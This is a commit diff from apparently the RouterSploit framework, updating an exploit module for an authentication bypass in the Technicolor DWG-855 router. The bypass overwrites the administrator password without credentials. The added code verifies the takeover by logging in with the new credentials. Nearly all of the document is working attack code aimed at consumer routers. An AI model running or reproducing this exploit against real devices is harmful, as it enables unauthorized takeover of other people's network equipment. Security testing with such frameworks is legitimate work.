Updated exploit info, fixed post-exploit check for success.

982d99f4 · John Mora · c42a0c69 · 982d99f4
Commit 982d99f4 authored Feb 19, 2017 by John Mora
Hide whitespace changes
Inline Side-by-side

Showing with 24 additions and 8 deletions

dwg855_authbypass.py ...rsploit/modules/exploits/technicolor/dwg855_authbypass.py +24 -8

No files found.
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+import base64
 from routersploit import (
    exploits,
    print_success,
@@ -19,11 +20,11 @@ class Exploit(exploits.Exploit):
        'name': 'Technicolor DWG-855 Auth Bypass',
        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous credentials, this is NOT stealthy.',
        'authors': [
-            'JPaulMora <https://JPaulMora.GitHub.io>',  # vulnerability discovery, routersploit module
+            'JPaulMora <https://JPaulMora.GitHub.io>',  # vulnerability discovery, initial routersploit module.
            '0BuRner',  # routersploit module
        ],
        'references': [
-            'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
+            'Bug discovered some time before Aug 2016, this is the first reference to it!\n   This exploit works with any POST parameter, but changing admin creds gives you access to everything else.',
        ],
        'devices': [
            'Technicolor DWG-855',
@@ -49,11 +50,27 @@ class Exploit(exploits.Exploit):
            response = http_request(method="POST", url=url, headers=headers, data=data)
            if response is None:
-                print_error("Target did not answer request")
+                print_error("Target did not answer request.")
            elif response.status_code == 401:
-                print_error("Target answered, denied access.")
+                #Server obeys request but then sends unauthorized response. Here we send a GET request with the new creds.
+                infotab_url = sanitize_url("{}:{}/RgSwInfo.asp".format(self.target, self.port))
+                user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
+                chekc_headers = {'User-Agent': user_agent,
+                           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+                           'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
+                           'Connection': 'keep-alive',
+                           'Accept-Encoding': 'gzip, deflate',
+                           'Authorization': base64.b64encode(self.nuser+":"+self.npass)}
+                check_response = http_request(method="GET", url=infotab_url, headers=chekc_headers)
+                if check_response.status_code == 200:
+                    print_success("Credentials changed!")
+                elif response.status_code == 401:
+                    print_error("Target answered, denied access.")
+                else:
+                    pass
            else:
-                print_success("Credentials changed")
+                print_error("Unknown error.")
        else:
            print_error("Exploit failed - Target seems to be not vulnerable")
@@ -66,11 +83,10 @@ class Exploit(exploits.Exploit):
                   'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
                   'Connection': 'keep-alive',
                   'Accept-Encoding': 'gzip, deflate',
-                   'Authorization': 'Og==',  # this is base64(":")
+                   'Authorization': base64.b64encode(":")}
-                   'Cache-Control': 'no-cache'}
        response = http_request(method="GET", url=url, headers=headers)
+        #print response.text.encode('utf-8')
        if response is not None and self.vulnresp in response.text.encode('utf-8'):
            return True
        else: